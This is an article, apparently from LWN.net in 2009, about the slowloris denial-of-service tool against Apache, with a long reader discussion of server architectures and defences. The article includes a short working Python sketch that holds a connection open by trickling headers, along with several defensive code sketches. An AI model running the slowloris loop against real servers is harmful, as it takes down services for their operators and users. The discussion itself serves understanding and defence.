Apache attacked by a "slow loris"
The slow loris is an exotic animal of southeast Asia that is best known for its slow, deliberate movements. The same quality characterizes the technique used by a new denial of service (DoS) tool that has been named after the animal. Slowloris was released to the public by security researcher "RSnake" on June 17. Unlike previously utilized DoS methods, slowloris works silently; still, it results in a quick and complete halt of the victim's Apache web server.
RSnake released slowloris only after contacting the Apache security team. Their response, while quick, was not quite what he expected:
RSnake commented that this response misses the point completely and that the security tips it points to are of no help. Subsequently, he released the slowloris script, which was followed by a confusing discussion that ranged over multiple blog postings, comments on those postings, and various mailing lists. On one side are hard-boiled experts who say they have known about this technique for years and that it is nothing new. On the other side are those who think it is genuinely new, or at least new to the public, and that it could have a devastating effect on the internet as a whole, or at least on the half of the world wide web that runs on Apache. Another Internet Storm Center (ISC) post provides more context, along with some useful comments.
However, the majority seems to be stunned by the simplicity of the attack and the fatal effect of it, as well as being puzzled by the reaction of the Apache security team. The team's response makes it seem as if the slowloris attack is well-known, leaving Apache installations vulnerable to DoS by script kiddies, and that there is nothing the Apache developers can do to prevent it. Consequently, they also closed the bugzilla report.
One particular commenter expressed his concern on the full disclosure mailing list with the following words:
AFFECTS
Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, Squid,
others...?
NOT AFFECTED
IIS6.0, IIS7.0, lighthttpd, others...?
It is not entirely clear which web servers have the means to defend against the attack, but there is general agreement that there is no way for Apache to completely defend against it, and that IIS is not vulnerable to the slowloris technique.
Looking more closely at the slowloris script provides an overview of the technique used. Slowloris gives the attacker a simple way to open an HTTP session with a server and to keep it open for a very long time — a lot longer than it would usually stay open: minutes or even hours.
The way the script achieves this goal can be likened to a person at a checkout lane in a store. Everyone has encountered someone paying the cashier, one by one — literally — in pennies. This can take time; often it feels like it is taking forever.
To a company with a chain of several stores, one such person does not affect business. For an online shop, however, there is a single URL, and slowloris unleashes hundreds if not thousands of these people approaching the checkout lane with an endless supply of pennies, ready to block the queue. For HTTP, slowloris uses HTTP headers instead of pennies, and it is ready to add a new header every 5, 10, or 299 seconds.
Unfortunately, the Apache cashier has no memory. With every penny dropped into its hands, it resets the timeout counter. With this technique it is rather simple to block every server thread or prefork process and bring the web server to a complete halt. Because the default Timeout setting for Apache is 300 seconds, each header added can stretch things out for that much longer.
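The core of the technique can be sketched in a few lines of Python. This is an illustrative reconstruction, not RSnake's actual script (which was written in Perl); the header name and the timing are arbitrary:

```python
import socket
import time

def partial_request(host: str) -> bytes:
    # Request line and Host header, but no terminating blank line:
    # the server keeps the connection open, waiting for more headers.
    return f"GET / HTTP/1.1\r\nHost: {host}\r\n".encode()

def trickle_header(n: int) -> bytes:
    # One bogus header line, sent shortly before the server's timeout
    # would expire; Apache restarts its timer on every line received.
    return f"X-a: {n}\r\n".encode()

def hold_connection(host: str, port: int = 80,
                    interval: float = 250.0) -> None:
    # Open one connection and keep it pinned indefinitely by staying
    # just under Apache's 300-second default Timeout.
    s = socket.create_connection((host, port))
    s.sendall(partial_request(host))
    n = 0
    while True:
        time.sleep(interval)
        s.sendall(trickle_header(n))
        n += 1
```

The real tool simply runs hundreds of these connections in parallel until every worker is pinned.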
An unfortunate side effect of this attack method is that the access log of the web server will not show it is under attack. Also, the messages in the error log are likely to be sparse. The CPU will be idle, no disk IO will be done, and there will also be hardly any network traffic to be seen. All you can observe is a large number of open network connections in the ESTABLISHED state.
Obviously, this is an application-level attack. In their book on Internet Denial of Service, Mirkovic, Dietrich, et al. noted that application-level DoS is difficult to handle: "[...] many defenses are not able to help you defend against this kind of attack".
So we are back to what the Apache Security team concluded: This is an inherent problem for servers. If you want to serve, then you have to accept clients, and, if they intend to block you, so be it.
But let's not give up so fast. Obviously, if the well-known proprietary alternative from Microsoft, IIS, is not affected by this problem, there are other solutions. What IIS does differently is how it handles incoming requests: there is no static tie between a worker thread and a network socket in IIS. Rather, the workers are organized in a pool where they wait for incoming TCP packets (rather than TCP connections, as Apache's do). These packets are then assigned dynamically to threads. So an idle connection occupies a socket, but it does not block an entire thread. Thus the web server need not be shut down by penny-wielding customers or slowloris.
Some developers pointed out that the AcceptFilter directive, used in conjunction with FreeBSD's accf_http(9) kernel accept filter, should be ported to Linux in order to help with the defense. But the accf_http filter only works with cleartext traffic, so this defense will not work for business-critical services running over SSL (i.e. HTTPS).
It has already been noted that you can catch a single attacking IP address with netstat and block it via your firewall. Or you can use any of the Apache modules that limit the number of sockets allowed for a single IP address; mod_qos seems best suited for this purpose. But this could block proxies or NAT routers that bundle multiple clients onto a single IP address. A threshold of 30 or even 100 sockets should pose no problems to the clients behind such proxies unless those sites are truly huge. Limiting connections to some threshold would help guard the server. But slowloris is only a proof of concept of an HTTP DoS. It could easily be extended into an HTTPS Distributed Denial of Service (DDoS) attack of a far nastier nature.
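A per-IP socket limit of the kind described above can be sketched as a small bookkeeping class. This is a hypothetical illustration of the idea, not mod_qos's implementation; the class name and threshold are made up:

```python
from collections import defaultdict

class PerIPLimiter:
    """Refuse new connections from an IP once it holds too many at once."""

    def __init__(self, max_per_ip: int = 30):
        self.max_per_ip = max_per_ip
        self.open_count = defaultdict(int)

    def try_accept(self, ip: str) -> bool:
        # Called when a connection from `ip` arrives.
        if self.open_count[ip] >= self.max_per_ip:
            return False          # over the threshold: reject
        self.open_count[ip] += 1
        return True

    def release(self, ip: str) -> None:
        # Called when a connection from `ip` closes.
        if self.open_count[ip] > 0:
            self.open_count[ip] -= 1
```

As the article notes, the threshold has to be generous enough not to lock out clients behind large NAT gateways, and the scheme does nothing against a distributed attacker with many source addresses.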
So it seems slowloris does not use the full potential of the attack method. The method can also be used more generally, which is why the name does not quite fit. The slow loris is an exotic animal, but the technique the script uses is not really exotic; it is very natural indeed: the client simply delays the request, just as slow internet connections used to do unintentionally. So, if there is a term that describes the general form of the attack, it should be "Request Delaying Attack".
In a follow-up blog post, RSnake has extended the concept to use keep-alive requests, and then delaying any subsequent requests. Other techniques are possible. They are described in great detail in a message to the ModSecurity mailing list from 2006.
Still, the attack has not yet been publicly observed in the wild, and there are still many experts that consider DDoS a non-issue.
RSnake did not claim to have invented the idea; in fact, he points out that Ivan Ristić had described it in his book on Apache Security in 2005. Furthermore, posts on the various mailing lists suggest the concept has been around since the 1990s, but RSnake has given this simple technique a wider audience.
Now that there is an audience, it is disturbing to see that the Apache community has so little to say about possible defenses. There has been some discussion on how to handle it, but overall the market leader seems rather complacent these days.
Index entries for this article
Security: Apache
Security: Vulnerabilities/Denial of service
GuestArticles: Folini, Christian
Apache attacked by a "slow loris"
Posted Jun 24, 2009 13:55 UTC (Wed) by nix (subscriber, #2304) [Link]
(Even that wouldn't fix a related problem: it isn't hard to hit a system with so many incoming sockets that it can't accept any more, either because of destination-port saturation or simple kernel memory saturation with socket buffers. To fix this problem properly, obvious sluggards must not merely be handed to a process that isn't DoSed, but actually kicked off. Doing that without penalizing people behind slow or overloaded network links is... an interesting problem. Note that the attack can also run the other way: send a normal request for a valid page, then read the result very slowly so that things block right back into the web server. It needs to be a big page, but those aren't hard to find.)
Apache attacked by a "slow loris"
Posted Jun 24, 2009 15:52 UTC (Wed) by hppnq (guest, #14462) [Link]
Hey, would it be possible to DoS the script kiddies who do not buy access to thousands of proxies, with a rogue Apache? ;-)
Apache attacked by a "slow loris"
Posted Jun 24, 2009 14:22 UTC (Wed) by mjthayer (guest, #39183) [Link]
Apache attacked by a "slow loris"
Posted Jun 24, 2009 14:49 UTC (Wed) by hppnq (guest, #14462) [Link]
That would not solve anything, but simply create another consumable, scarce resource.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 15:13 UTC (Wed) by mjthayer (guest, #39183) [Link]
Apache attacked by a "slow loris"
Posted Jun 24, 2009 15:49 UTC (Wed) by hppnq (guest, #14462) [Link]
You would run out of memory, I guess. My comment was mostly inspired by the observation that the DoS is caused by Apache's rather relaxed handling of the HTTP protocol, which in principle makes the lower-level data processing irrelevant. But of course the DoS would appear differently.

You may want to take a look at network channels, by the way: your idea is really not crazy at all. :-)
Apache attacked by a "slow loris"
Posted Jun 28, 2009 20:23 UTC (Sun) by pphaneuf (guest, #23480) [Link]
No matter how you implement it, there's a fixed cap on the number of TCP connections per IP address. You could add IP addresses to a server, but that would be a waste of another precious resource, since during normal usage, most web servers can't handle the maximum number of connections of a single IP.
Apache attacked by a "slow loris"
Posted Jun 28, 2009 21:59 UTC (Sun) by dlang (guest, #313) [Link]
the limit is that you cannot duplicate the (source IP, source port, destination IP, destination port) tuple within about a 2 min period
when connecting to a server the destination port and destination IP are fixed, so a client can make lots of connections and make it so that no other connections could be made from that source IP, but that doesn't hurt anyone else.
that also isn't the attack that's happening here.
Apache attacked by a "slow loris"
Posted Jun 28, 2009 20:43 UTC (Sun) by pphaneuf (guest, #23480) [Link]
I think the key difference is how timeouts are handled. If the 300 seconds timeout in Apache is reset at every header (or worse, at every packet received, which could be one character each!), then you could stretch something for a long time. Maybe lighttpd and IIS do something like give it 300 seconds to get all the headers, and after that, too bad, you're just cut off (freeing the TCP port for another connection). You could still mount some sort of DoS attack, but the attacker would have to keep it up more intensively, so that very few legitimate clients manage to slip by as well as Slowloris does for affected servers (which is eventually a 100% effectiveness, with next to zero difficulty for the attacker).
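The distinction described in this comment can be made concrete: instead of resetting a timer on every received line, give the whole header block one absolute deadline. A minimal sketch using Python's asyncio, purely illustrative (none of the servers named here actually work this way internally):

```python
import asyncio

async def read_request_headers(reader: asyncio.StreamReader,
                               deadline: float = 300.0) -> bytes:
    # One timeout covers the *entire* header block. A client trickling
    # one header line every few seconds still gets cut off when the
    # deadline expires, no matter how recently its last byte arrived.
    return await asyncio.wait_for(reader.readuntil(b"\r\n\r\n"),
                                  timeout=deadline)
```

With a per-read timeout, by contrast, each trickled byte buys the attacker another full timeout period.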
Apache attacked by a "slow loris"
Posted Jun 28, 2009 22:05 UTC (Sun) by dlang (guest, #313) [Link]
hopefully this will force the apache team to tackle this issue and separate the timeouts, but from the article it sounds like they are not responding well.
they are right that the basic attack approach of having a botnet of servers connect to an apache server and tie it up is an old attack that has been possible forever. fixing the timeout issues will not address that, and even after fixing the timeouts attackers can kill the apache server by making legitimate requests that take time to process. but fixing the timeouts will go a long way towards leveling the playing field again; right now it's tilted heavily in favor of the attackers.
Apache attacked by a "slow loris"
Posted Jun 29, 2009 1:20 UTC (Mon) by njs (subscriber, #40338) [Link]
The original report said that Squid was affected, but the Squid maintainers can't reproduce it (http://www.squid-cache.org/bugs/show_bug.cgi?id=2694); looks like a mistake in the original report to me.
> and IIS uses a thread-per-connection (if I recall correctly)
The article here claims that IIS does not use thread-per-connection, but rather some sort of asynchronous state-machine design (like lighttpd or squid) plus a thread pool to parallelize that state-machine.
> Maybe lighttpd and IIS do something like give it 300 seconds to get all the headers, and after that, too bad, you're just cut off
No -- they just handle the slow connection as normal. The difference is that for them, an idle connection costs a few bytes of memory describing that connection, and one can easily have thousands of these data structures sitting around without anyone noticing. For Apache, an idle connection ties up an entire server process, and for various reasons you can't have thousands of server processes sitting around.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 15:05 UTC (Wed) by epa (subscriber, #39769) [Link]
Apache attacked by a "slow loris"
Posted Jun 25, 2009 16:25 UTC (Thu) by iabervon (subscriber, #722) [Link]
HTTP is "stateless" only in that you often return to the default state, not in that you never leave the default state. UDP is only really appropriate for cases where you don't care if your message is received and you won't get a response to it.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 15:35 UTC (Wed) by mjthayer (guest, #39183) [Link]
Apache attacked by a "slow loris"
Posted Jun 24, 2009 15:59 UTC (Wed) by mjthayer (guest, #39183) [Link]
Apache attacked by a "slow loris"
Posted Jun 24, 2009 20:49 UTC (Wed) by aliguori (subscriber, #30636) [Link]
The Right Thing to do is to use a state machine to process incoming requests so that a single thread can handle many requests at once. You will then be bound by processor/memory/bandwidth.
You could still do a slowloris attack against IIS, but it becomes a traditional DoS because you have to be able to exhaust the web server's resources with your local resources. What makes Apache vulnerable here is that you don't need a lot of resources on the client to exhaust Apache's resources, regardless of how much more powerful the server is.
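The per-connection state such an event-driven design needs really is tiny. A toy sketch (hypothetical, not lighttpd's or IIS's actual code) of the bookkeeping one state-machine thread would keep for each socket:

```python
class ConnectionState:
    """Per-connection record for an event-driven server: a small buffer
    and a flag, instead of a whole thread or process."""

    def __init__(self):
        self.buf = b""
        self.request_complete = False

    def feed(self, data: bytes) -> bool:
        # Called whenever the event loop reads data from this socket.
        self.buf += data
        if b"\r\n\r\n" in self.buf:
            self.request_complete = True   # full header block received
        return self.request_complete
```

Ten thousand slowloris connections then cost ten thousand small objects rather than ten thousand blocked workers, and only a complete request is ever handed to the expensive processing machinery.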
Apache attacked by a "slow loris"
Posted Jun 24, 2009 21:05 UTC (Wed) by mjthayer (guest, #39183) [Link]
All modern OSes offer alternative
Posted Jun 25, 2009 4:23 UTC (Thu) by khim (subscriber, #9252) [Link]
Have you seen the surveys? Do you know WHY nginx is growing so fast? Do you even know WHAT nginx is? It's a caching web server. It can serve static web pages and protect the "real" server (often an Apache server) from the slowloris attack. And it DOES NOT use "a heavy-weight polling syscall" - all modern operating systems offer an alternative...
P.S. The real motivation was not to fight the slowloris attack - it was to reduce server load when talking with thousands of dial-up clients. Think about it: if you have a huge number of very slow clients, the dynamic is the same! Server processes or threads are tied up for minutes when they serve "feature-rich" pages to clients who only consume 1Kb per second. Apache was unable to cope (the nginx author tried to fix it for years), so a new web server was born. And as the statistics show, real admins who are in charge of real sites know all about this problem. Tempest in a teapot...
All modern OSes offer alternative
Posted Jun 25, 2009 4:31 UTC (Thu) by quotemstr (subscriber, #45331) [Link]
Why do you need an entirely new web server? Couldn't you do the same thing with a caching reverse proxy like Varnish? That way, you only need to configure one set of servers.
All modern OSes offer alternative
Posted Jun 25, 2009 4:45 UTC (Thu) by khim (subscriber, #9252) [Link]
> Why do you need an entirely new web server?

Because you need solutions, not buzzwords. I've explained why you need two servers below. Without the "real" web server you can serve static pages (icons, images, etc.) via sendfile(2), and this is important for real-world servers.
> Couldn't you do the same thing with a caching reverse proxy like Varnish?

You can name your frontend server "web server", "web accelerator" or use any other term, but if your frontend is "heavily threaded, with each client connection being handled by a separate worker thread" then you have just added complexity without any benefit. What will happen to your frontend if you have 50,000 clients with open connections? Nginx can handle such a load on a medium-sized system.
> That way, you only need to configure one set of servers.

You still need to configure the server. Nginx was designed from the ground up to do two things and do them well:
1. Serve static pages.
2. Work as http-accelerator.
All modern OSes offer alternative
Posted Jun 25, 2009 5:43 UTC (Thu) by quotemstr (subscriber, #45331) [Link]
> Because you need solutions, not a buzzwords?

This coming from somebody who's hawking a specific product as the solution to a whole class of problems? I don't think I'm the one who has to worry about buzzwords here.
> You still need to configure server.

Reading the nginx webpage, it appears you can configure nginx as a caching reverse proxy. That's fine. My issue is that you pretend it's the only game in town when really, any caching reverse proxy will do. (And feature sets may differ; Varnish, for example, appears to have a more sophisticated load balancer.)
Also, I can't fathom why you would want your web accelerator serving content on its own. A caching reverse proxy setup is the only one that makes sense to me: that way, you have one place to configure what's served: the back-end servers. Because the back-end servers already mark what's static and what's not (via cache-control HTTP headers), you shouldn't have to do anything special to push static content to the front-end server, and the reverse proxy asking the back-end servers once in a while for some static content won't make a difference in the overall load.
All modern OSes offer alternative
Posted Jun 26, 2009 12:21 UTC (Fri) by tcabot (subscriber, #6656) [Link]
On the other hand, let's say that your site serves massive quantities of "interesting" image files (which I understand was the original use case for nginx). In that case the server needs to be extremely efficient because the working set is so large that a cache wouldn't do much good.
Horses for courses.
Varnish is the answer
Posted Jun 26, 2009 13:04 UTC (Fri) by dion (guest, #2764) [Link]
If all you want to do is to mitigate a Slow Loris attack then just move your web server to a different port and start Varnish with the default configuration on port 80.
nginx vs slowloris
Posted Jul 4, 2009 17:18 UTC (Sat) by gvy (guest, #11981) [Link]
Vitya, linux.kiev.ua is running nginx + apache-1.3 and it's rather depressed by slowloris in my tests. Could you please elaborate on how to cook things up so as to protect dynamic paths? I could only come up with proxying stuff for at least some fixed minimal timeout (which is not an option for lots of pages), and googling 'nginx slowloris' doesn't yield anything particularly useful to me.

PS: nginx is really an excellent static httpd/reverse proxy; anyone running a moderately busy site should consider looking into it. It could drop apache instance numbers by an order of magnitude, together with the RAM occupied by them.
Apache attacked by a "slow loris"
Posted Jun 25, 2009 4:29 UTC (Thu) by quotemstr (subscriber, #45331) [Link]
So you're talking about having Apache implement TCP in userspace? That makes no technical sense whatsoever. The kernel implementation is thoroughly debugged, mature, patched regularly, and faster to boot. Apache would have to maintain just as much state as it does today, and moving TCP to userspace solves nothing.

A "socket" is just a handle to a tiny bit of state information describing the connection, and of course it's the right abstraction: it's what the protocol is specified to use, and in-order, streamed delivery is the perfect medium for HTTP anyway.
The real problem here is what Apache does after it reads data from a socket. Recall that both lighttpd and IIS use sockets (just like every other network daemon on Earth), and they are not vulnerable to this attack.
The counter to this attack is simple, really, and it's conceptually the same as a counter to a SYN flood: only commit your resources when the remote party has committed his own. The problem here is how to shoehorn that idea into Apache's model, which commits resources (in this case, processes) very early.
Here's one uninformed idea: accept connections and read HTTP requests in one master process, asynchronously. Only when a complete request has been read, send the file descriptor of the connection to a worker; the actual handoff can be achieved by passing an SCM_RIGHTS control message over a Unix domain socket.
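Python's standard library can demonstrate the descriptor handoff this comment describes (a minimal sketch of the SCM_RIGHTS mechanism, not an actual Apache patch; Unix-only, Python 3.9+, and the function names are made up):

```python
import socket

def send_connection(channel: socket.socket,
                    conn: socket.socket, note: bytes = b"ready") -> None:
    # Master side: hand the accepted connection's file descriptor to a
    # worker over a Unix-domain socket via an SCM_RIGHTS control message.
    socket.send_fds(channel, [note], [conn.fileno()])

def recv_connection(channel: socket.socket) -> "tuple[bytes, socket.socket]":
    # Worker side: receive the note and rebuild a socket object around
    # the transferred descriptor.
    note, fds, _flags, _addr = socket.recv_fds(channel, 1024, maxfds=1)
    return note, socket.socket(fileno=fds[0])
```

The master never blocks on a slow client, and the worker only ever sees connections whose requests have already arrived in full.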
Apache attacked by a "slow loris"
Posted Jun 27, 2009 15:06 UTC (Sat) by dmag (guest, #17775) [Link]
No, having a generic library for TCP in user space.
> That makes no technical sense whatsoever.
Please read the linked article. http://lwn.net/Articles/169961/
> The kernel implementation is thoroughly debugged, mature, patched regularly,
Agreed.
> and faster to boot.
No. Right now, the driver gets the packet, later the kernel gets around to looking at it (maybe doing checksums, etc.), and then much later userspace requests it. If each of these happens on a different CPU, you will waste thousands (tens of thousands?) of instructions because of CPU caches and data-locking issues.
To become a better programmer, read this: http://lwn.net/Articles/250967/
It's really long, but pay attention to the parts where loops get 10x faster just by re-arranging data structures.
> The real problem here is what Apache does after it reads data from a socket.
Agreed. User-space TCP sockets are icing on the cake once you've solved the current bottleneck.
> Here's one uninformed idea: accept connections and read HTTP requests in one master process, asynchronously.
But why does that process *have* to be Apache? Just put another web server in front of it (Nginx, Varnish, etc.). Apache is really a "big and expensive" single-threaded application server (mod_php, mod_passenger, mod_perl, etc.). In fact, Apache isn't especially good at serving static files either. I have to admit, Nginx has the best architecture (but consider Varnish if caching is a big win).
It's like when you go to the big warehouse stores, and before you get to the front of the line, some guy with a scanner has already scanned your cart, and all you do is pay at the register without waiting.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 14:33 UTC (Wed) by bangert (subscriber, #28342) [Link]
many connections, each of which don't seem to be doing anything... the first time around was roughly 2 years ago IIRC.

it happened too rarely to warrant the implementation of mod_qos/mod_security, but i expect it would have worked fine. the ad-hoc solution was a firewall block on the offending ip.
does someone know of an mpm, which implements IIS's behavior?
Apache attacked by a "slow loris"
Posted Jun 24, 2009 15:17 UTC (Wed) by wzzrd (subscriber, #12309) [Link]
There are no such mpm and there will never be such an mpm
Posted Jun 25, 2009 4:33 UTC (Thu) by khim (subscriber, #9252) [Link]
does someone know of an mpm, which implements IIS's behavior?
This is a huge design question: do you want extensibility in your web server or not? Suppose someone went and implemented such an mpm. Then your server has a state machine and everything. Now, what'll happen if a single thread is handling 1000 clients in your server and that thread calls the php interpreter? 1000 angry clients, that's what (think about it).
To make such a scheme usable you need to split the web server in two: a lightweight frontend (with state machine, fancy kernel interface and everything) and a backend (with php, mysql connections and so on). And guess what: such a scheme is implemented, and as the last survey shows it is used by millions. The fact that the frontend is called nginx and not "apache enhanced engine accelerator" does not change anything.
There are no such mpm and there will never be such an mpm
Posted Jun 25, 2009 5:51 UTC (Thu) by quotemstr (subscriber, #45331) [Link]
> ...you need to split web-server in two: lighweight frontend (with state machine, fancy kernel interface and everything) and backend (with php, mysql connections and so on).

Agreed.
> The fact that frontend is called nginx and not "apache enhanced engine accelerator" does not change anything.

There are many different ways of realizing the frontend-backend split, and nginx is just one of them. You can use FastCGI server processes; you can run a conventional proxy as a reverse proxy; you can run a specialized reverse proxy that's not called nginx; you can use Akamai; or you can do a thousand other things. Plenty of people manage to split their front and back ends without using nginx.
There's a word for people who deliberately conflate the conceptual model of a solution with a specific implementation of that solution: salesmen.
Sure, nginx is pretty neat, but it's not the only way to implement what we agree is the necessary architecture.
There are no such mpm and there will never be such an mpm
Posted Jun 28, 2009 19:41 UTC (Sun) by marcH (subscriber, #57642) [Link]
But there is worse: those who do not! Software patent lawyers.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 15:28 UTC (Wed) by mcmanus (guest, #4569) [Link]
An async architecture based around epoll would certainly make the thing scale much better - I've worked on systems that could handle 100,000 idle (or extremely slow) http connections without meaningfully impacting the performance of a few hundred live ones. Such an architecture is even mentioned on the apache-dev link that is provided in the article, so it's not like that's news.
But that kind of hand-managed parallelism development style is what a thread is meant to abstract away. The real question to me is why threads are such a scarce and/or unscalable resource?
Specifically, I am curious to know what happened to all the talk of linux 2.6 and 100,000 concurrent threads from a few years back: http://kerneltrap.org/node/422
Should the default config be cranking up the max number of thread allocations (and the default stack sizes for them down), and if not - where is the bottleneck that prevents that?
Apache attacked by a "slow loris"
Posted Jun 24, 2009 15:34 UTC (Wed) by mjthayer (guest, #39183) [Link]
Apache attacked by a "slow loris"
Posted Jun 24, 2009 16:17 UTC (Wed) by NAR (subscriber, #1313) [Link]
Anyway, is this bug HTTP-protocol specific? I'd guess it can affect any services which are expected to keep a session open for a long time, if the client can use a lot less memory for each connection than the server...
Apache attacked by a "slow loris"
Posted Jun 25, 2009 9:52 UTC (Thu) by Darkmere (subscriber, #53695) [Link]
This "bug" is the same as the SMTP tarpit and others, but instead of working on the server side, it works on the client side, against the server. So it works on the same basis that so many other attacks do: find a limited resource on the server, find a way to make the server hit that limit, lean back and reap the profits.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 16:20 UTC (Wed) by mcmanus (guest, #4569) [Link]
Obviously you can't use all of the vmm map for thread stacks - but you can use a lot of it. And if 32KB is not enough, then it's a state problem, not a threading problem (i.e. an async design scenario would need to stash the state somewhere too). Plus apache has that hybrid process/thread model, so each process has its own vm map.
Maybe 100K threads is hyperbole if you're all in one process, but 50+K seems quite reasonable from a memory management standpoint and makes a thread much less of a scarce resource than it is in the default apache config (2 or 3 hundred iirc).
I'm more curious if Linux kernel/libc could handle the creation and scheduling of so many threads. If not then that's kind of a setback from the direction of things when 2.6 was being released (see the link I provided last post), and if it can it seems a much easier approach than rearchitecting the application.
Fundamentally, isn't this multiplexing the kind of thing the OS should be doing for you efficiently?
Apache attacked by a "slow loris"
Posted Jun 24, 2009 16:31 UTC (Wed) by smurf (subscriber, #17840) [Link]
Apache is generally configured so that the maximum number of _real_ work threads (i.e. including all that state) doesn't cause the system to swap excessively. A slowloris connection eats much fewer resources than that, but Apache doesn't know that and thus reaches the configuration's limit far too quickly.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 17:03 UTC (Wed) by mcmanus (guest, #4569) [Link]
But it does seem to me that if what Apache is trying to prevent is memory exhaustion, then it should be doing admission control based on memory allocated instead of using max clients as a poor stand-in. Especially as the two don't correlate well at all even in normal (i.e. non DoS) situations.
Apache attacked by a "slow loris"
Posted Jun 25, 2009 5:29 UTC (Thu) by quotemstr (subscriber, #45331) [Link]
(Reading this over, it's a bit of a ramble. Sorry about that.)

Virtual memory isn't the problem per se. Apache isn't running out of virtual memory. The attack is against Apache's own limit on the number of simultaneous outstanding requests. Returning to the supermarket analogy, the problem isn't running out of space in the store for cashiers, but simply tying up all the existing ones.

Now, you can increase these limits in order to defeat the attack. There's the problem: Apache's resource consumption can be too high to service the number of simultaneous connections required. For prefork servers, the problem is especially severe: each simultaneous request requires its own process. Now, any serious operating system can handle thousands of processes; that's not the problem. You can even have thousands of Apache processes, since Apache workers are actually pretty light, memory-wise, and all the code and some of the data structures are shared among all workers.
More of an issue is the mod_* idiocy that embeds an interpreter in each worker process. Then, when you have thousands of processes, you run into problems far more severe than virtual address space exhaustion: swap thrashing, poor performance, machine lockups, and OOM-killing sprees.
Using threads, in principle, helps the problem. Each thread shares the same process, meaning the additional memory occupied by each new simultaneous connection is just the memory needed to keep track of that connection; if all the threads share a single copy of the interpreter and other data structures, I bet you can avoid the slowloris problem entirely by simply setting connection limits high enough.
A small variant of this approach is to use multiplexed I/O, as in lighttpd; that's like using the threaded approach above, but you don't need a thread stack for each simultaneous connection. In practice, if you make the thread stack small enough, you can still fit thousands in a 32-bit virtual address space.
The problem with threads is that you need threads, though! The free world's most inexplicably-popular web scripting language, PHP, doesn't have a thread-safe interpreter. That limitation leads us to another solution: divorce the heavyweight state from the HTTP handler, and use something like FastCGI to communicate with the interpreter. That way, you can have as many (cheap) HTTP connection handlers (threads, processes, or state machines) as you'd like, and still limit the number of heavyweight interpreters you need. (Using separate processes for the heavy lifting is better than mixing all the threads together anyway; see below.)
To deal with slowloris attacks, just batch all the headers up in a request before sending the whole request on to the heavyweight process that actually does something meaningful with it. (That's what mod_fastcgi does.) That way, a slowloris-using attacker can pound away at the lightweight worker thread (or process), and only when a complete request is read will the system actually commit to using a significant resource, one of the heavyweight FastCGI servers.
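The batching idea described above can be sketched in a few lines. This is a hypothetical illustration, not mod_fastcgi's actual code: the cheap front end accumulates bytes per connection and only hands a request downstream once the blank line ending the headers has arrived, so a slowloris client does nothing but slowly grow a small buffer.

```python
# Hypothetical sketch of the "buffer the full headers first" idea.
# Per connection, the only state is a byte buffer; nothing heavyweight
# is committed until the request is complete.

HEADER_END = b"\r\n\r\n"
MAX_HEADER_BYTES = 8192   # drop pathological clients outright

def feed(buf: bytes, chunk: bytes):
    """Add newly received bytes; return (new_buffer, complete_request).

    complete_request is None until the full header block has arrived,
    so no heavyweight backend resource is used before that point.
    """
    buf += chunk
    if len(buf) > MAX_HEADER_BYTES:
        raise ValueError("headers too large; drop the connection")
    end = buf.find(HEADER_END)
    if end == -1:
        return buf, None   # still trickling in; keep waiting cheaply
    return b"", buf[:end + len(HEADER_END)]
```

A slowloris connection simply never reaches the second return, so it never occupies one of the expensive FastCGI servers.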
lighttpd can't use embedded interpreters; its state machine precludes that. Instead, people generally set it up to use FastCGI: guess why lighttpd is not vulnerable to slowloris attacks. If you configure Apache appropriately, you can make it work similarly.
(Before you say, "but wait! FastCGI is pretty slow!" -- that's simply not true. The HTTP user-agent's communication to the server is orders of magnitude slower than the local communication between Apache and a FastCGI server. The FastCGI communication doesn't add any meaningful time to each request, so it doesn't increase latency. And since each application is sequestered into its own process instead of running in each worker process in Apache, total memory use can actually be lower than the mod_* model.
As if that weren't a good enough reason to use FastCGI (or something similar, like scgi), it's also a lot easier to keep track of your web application's system resource usage as distinct from the web server's. You can actually measure the CPU consumption of, say, squirrelmail without conflating it with Apache's.)
Oh, and there's an even better reason: nothing forces a FastCGI server to run as the same user as the web server. Finally, you can put an end to anything remotely related to the web having to be owned by apache. Each application can have its own user, and be limited to its own little corner of the machine just like any other kind of network-facing daemon. Really, mod_* is just an ugly hack that's completely unnecessary today.)
Apache attacked by a "slow loris"
Posted Jun 24, 2009 19:22 UTC (Wed) by guus (subscriber, #41608) [Link]
Apache attacked by a "slow loris"
Posted Jun 25, 2009 15:35 UTC (Thu) by elanthis (guest, #6227) [Link]
Honestly, if at the end of the day you don't need any of the Apache modules (maybe you're using regular CGI or FastCGI or something), then just don't use Apache; instead, use one of the newer, more efficient, more scalable open source web servers, like lighttpd, Cherokee, etc.
(Unfortunately, the lack of .htaccess support in those servers, and hence the lack of mod_rewrite-compatible user-configurable rewrites and redirects, is a real issue for a lot of hosts. If those servers added an optional module for basic .htaccess-like support, they'd probably skyrocket in adoption.)
Apache attacked by a "slow loris"
Posted Jun 24, 2009 16:38 UTC (Wed) by drag (guest, #31333) [Link]
People above were talking about running out of memory and socket limitations and things like that...
But I don't understand why Lighttpd and IIS are not affected, but Apache is. Can anybody explain that to me?
If it only seems to affect Apache, then the solution to the problem should be pretty obvious: other sorts of web servers are very common and their behavior should be well known!
Apache attacked by a "slow loris"
Posted Jun 24, 2009 17:05 UTC (Wed) by tialaramex (subscriber, #21167) [Link]
In contrast the design in products like IIS allocates nothing but a socket and a little bit of working space until the "slow loris" has written out a whole request which can be answered. Many, many more such requests can be tolerated on the same hardware.
Thus, a thousand "slow loris" connections to your IIS are merely an annoyance, nothing that needs urgent action, while on Apache they've probably effectively taken your site off the Internet.
Apache attacked by a "slow loris"
Posted Jun 24, 2009 17:59 UTC (Wed) by drag (guest, #31333) [Link]
Which is, generally, a good solution for people with servers that use a lot of server-side scripting anyways.
Or something
Posted Jun 25, 2009 4:53 UTC (Thu) by khim (subscriber, #9252) [Link]
So the easy solution, I suppose, is just to use Lighttpd or something like that as a reverse proxy for your Apache server.

If you look at the latest survey, you'll find out that millions are already running "something like that". Nginx was designed from the ground up to work in such a situation: if you know your Apache process usually generates a page 100K in size, you can specify this as the buffer size to nginx, and then your "real" server will be freed in milliseconds; when the occasional longer page is generated, nginx will wait for the backend. Lighttpd uses a similar architecture, but it's less configurable when used as an HTTP accelerator.
